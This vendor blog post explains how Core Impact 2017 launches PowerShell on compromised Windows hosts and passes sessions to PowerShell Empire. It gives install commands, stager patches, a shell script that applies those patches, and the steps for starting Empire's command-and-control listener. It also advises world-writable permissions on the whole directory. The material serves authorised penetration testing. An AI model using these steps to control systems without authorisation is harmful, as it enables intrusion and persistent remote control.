We’re releasing the new version of Core Impact shortly, with some exciting new features. I can’t speak for anyone but myself, but the single most exciting new feature in Impact 2017 is our new ability to launch PowerShell natively on target systems. PowerShell is an incredibly well-designed tool for exploiting Windows systems.

When you have an agent on a system that supports PowerShell (and has it installed), all you have to do is right-click on the Agent and select PowerShell Shell from the context menu to get a full remote PowerShell on the target.

You can also type #help to figure out what you’re doing.

This also presents me the opportunity to present something else that’s awesome. There is a most excellent pure-PowerShell post-exploitation tool called PowerShell Empire. With this version of Impact, we’re also releasing the capability to pass a session from an Impact agent to a PowerShell Empire agent. Since PowerShell Empire’s command and control functionality doesn’t run on Windows, we’re going to have to build a virtual machine for it, which I’ve documented step by step for you.

First, go ahead and download Ubuntu 14.04.5 LTS from http://releases.ubuntu.com/14.04/. Though this isn’t the latest and greatest version, it is the base build that our Quality Assurance team has validated on. When I get a moment, I’ll write up instructions for successfully operating on the newer release.

Go ahead and spin up a virtual machine on the platform of your choice, and start the installation. It’s important to understand that your Impact system needs to be able to communicate with BOTH the Empire system and the target, and the target must be able to communicate back to both the Impact system and the Empire system. So, if something doesn’t want to talk to something else, check your network configuration for NATing first.

Since I’m using VMware Workstation as my virtualization platform, I get to cheat and grab a caffeinated beverage while it does the hard work of installing Ubuntu with the default settings and installing open-vm-tools so that it plays nicely with the hypervisor. If you aren’t leveraging similar automation, make sure that you run sudo apt-get install open-vm-tools and reboot so that the VM knows it’s a VM. (Yes, I’ve spent hours troubleshooting crappy VM performance before I realized that I forgot to install the tools. Please take a moment to laugh, and learn from my personal misfortune as part of your continued professional development.)

Once you’ve completed the installation, pop a terminal window with Ctrl-Alt-T, and run the command sudo apt-get update.

Go grab another beverage and enjoy it while you wait.

Next:

sudo apt-get install python-pip

wget https://github.com/adaptivethreat/Empire/archive/1.5.tar.gz

tar -xzvf 1.5.tar.gz

cd Empire-1.5

sudo ./setup/install.sh

At this point, the install script will prompt you for permission to install dependencies. I suggest you say “Yes” if you want a functional installation at the end of the exercise. In fact, it’ll ask you several times. So don’t wander off for a long lunch while this is brewing…

When it finishes, it’ll prompt you for a server password, which you will want to remember.

Now for the hard part: we need to apply patches to the default PowerShell Empire 1.5 installation so that our session passing will work. Thankfully, these are two single-line changes.

First, fire up your preferred text editor, open lib/common/stagers.py, and go to line 127.

You need to update the line to look like this:

     def generate_stager_hop(self, server, key, encrypt=True, encode=False):

The second file is data/agent/stager_hop.ps1.

 
The final line needs to be updated so that it reads:

} Start-Negotiate -s "REPLACE_SERVER" -SK 'REPLACE_STAGING_KEY' -UA $u;
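
The two edits above are easy to get slightly wrong by hand (a smart quote, a missed trailing semicolon, the wrong line after an editor shifts line numbers), so here is a small POSIX shell script, added for this write-up and not part of the Empire project, that applies both one-line changes to an Empire-1.5 tree and verifies them. It locates the generate_stager_hop definition by pattern rather than by line number 127 (assuming stagers.py has exactly one such def) and replaces the last line of stager_hop.ps1 with the line the post gives. The stand-in files it builds for its own demo are constructed here; they are not the real Empire sources.

```shell
#!/bin/sh
# Added example: apply and verify the two Empire 1.5 session-passing patches
# described in the post. Not part of the original post or of Empire itself.
set -u

# The exact lines the post says each file must contain after the edit.
PY_LINE='def generate_stager_hop(self, server, key, encrypt=True, encode=False):'
HOP_LINE="} Start-Negotiate -s \"REPLACE_SERVER\" -SK 'REPLACE_STAGING_KEY' -UA \$u;"

# Replace the generate_stager_hop signature in lib/common/stagers.py.
# Matches on the def name (assumption: only one such def exists) and keeps the
# original indentation, so it does not depend on the line being exactly 127.
patch_stagers_py() {
    py="$1/lib/common/stagers.py"
    [ -f "$py" ] || { echo "missing $py" >&2; return 1; }
    sed 's/^\([[:space:]]*\)def generate_stager_hop(.*$/\1'"$PY_LINE"'/' "$py" > "$py.tmp" \
        && mv "$py.tmp" "$py"
}

# Replace the final line of data/agent/stager_hop.ps1 with the required one.
# 'sed $d' drops the last line; printf appends the replacement verbatim
# (no shell expansion of the literal $u).
patch_stager_hop_ps1() {
    ps1="$1/data/agent/stager_hop.ps1"
    [ -f "$ps1" ] || { echo "missing $ps1" >&2; return 1; }
    sed '$d' "$ps1" > "$ps1.tmp" \
        && printf '%s\n' "$HOP_LINE" >> "$ps1.tmp" \
        && mv "$ps1.tmp" "$ps1"
}

# Apply both patches to an Empire-1.5 directory. Safe to run twice.
apply_empire_patch() {
    patch_stagers_py "$1" && patch_stager_hop_ps1 "$1"
}

# Return 0 only if both files carry the expected lines (and the ps1 line is
# really the last one). Use this before starting ./empire.
verify_empire_patch() {
    grep -Fq -- "$PY_LINE" "$1/lib/common/stagers.py" 2>/dev/null || return 1
    [ "$(tail -n 1 "$1/data/agent/stager_hop.ps1" 2>/dev/null)" = "$HOP_LINE" ] || return 1
    return 0
}

# Constructed stand-in tree for the demo (not the real Empire sources): only
# the method signature and the trailing line matter to the patch functions.
make_constructed_tree() {
    mkdir -p "$1/lib/common" "$1/data/agent"
    printf '%s\n' 'class Stagers:' \
        '    def generate_stager_hop(self, server, key, PLACEHOLDER_ARGS=True):' \
        '        pass' > "$1/lib/common/stagers.py"
    printf '%s\n' 'function Start-Negotiate {' '    param($s, $SK, $UA)' '}' \
        '} Start-Negotiate -s "REPLACE_SERVER";' > "$1/data/agent/stager_hop.ps1"
}

# Demo: build the constructed tree, show it fails verification, patch, re-verify.
demo() {
    d=$(mktemp -d)
    make_constructed_tree "$d"
    if verify_empire_patch "$d"; then
        echo "unexpected: constructed tree already patched" >&2
        return 1
    fi
    apply_empire_patch "$d" || return 1
    verify_empire_patch "$d" && echo "both Empire 1.5 patches applied and verified under $d"
}

demo
```

For a real install, run apply_empire_patch and verify_empire_patch against the Empire-1.5 directory you unpacked above instead of the constructed tree; if verify_empire_patch fails after patching, diff the two files against the lines quoted in the post before starting the server.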

Finally, you’ll want to set the permissions on the entire Empire-1.5 directory:

chmod -R 777 Empire-1.5

Now we’re ready to start up the Empire console and server. You’ll want to start another terminal session in the VM, so that you have both components available to watch.

In the first, navigate to the Empire-1.5 directory, then run ./empire

In the second, also make sure that you’re in the Empire-1.5 directory, and run ./empire --rest --password Password

Pick your own password, of course…

Inside the Empire console, enter the following commands:

listeners

set Name StartingListener

Run

Now, we can pop back over into Impact, where I’ve already placed an Impact agent on a Windows 2008 Server with PowerShell installed. I’ll go ahead and drag the Deploy Powershell Empire Agent module onto the target server.

 
After a few moments, if nothing goes wrong, you’ll see a success message in the Module Log:

 
And over on the PowerShell Empire machine you’ll see a message in the console like so:

 
From the Empire console, type agents to go into the agents menu.

To work with the Empire agent, type interact <agentname>. Pro tip: you can use tab completion to fill in the agent name, or rename it to something more readily memorable.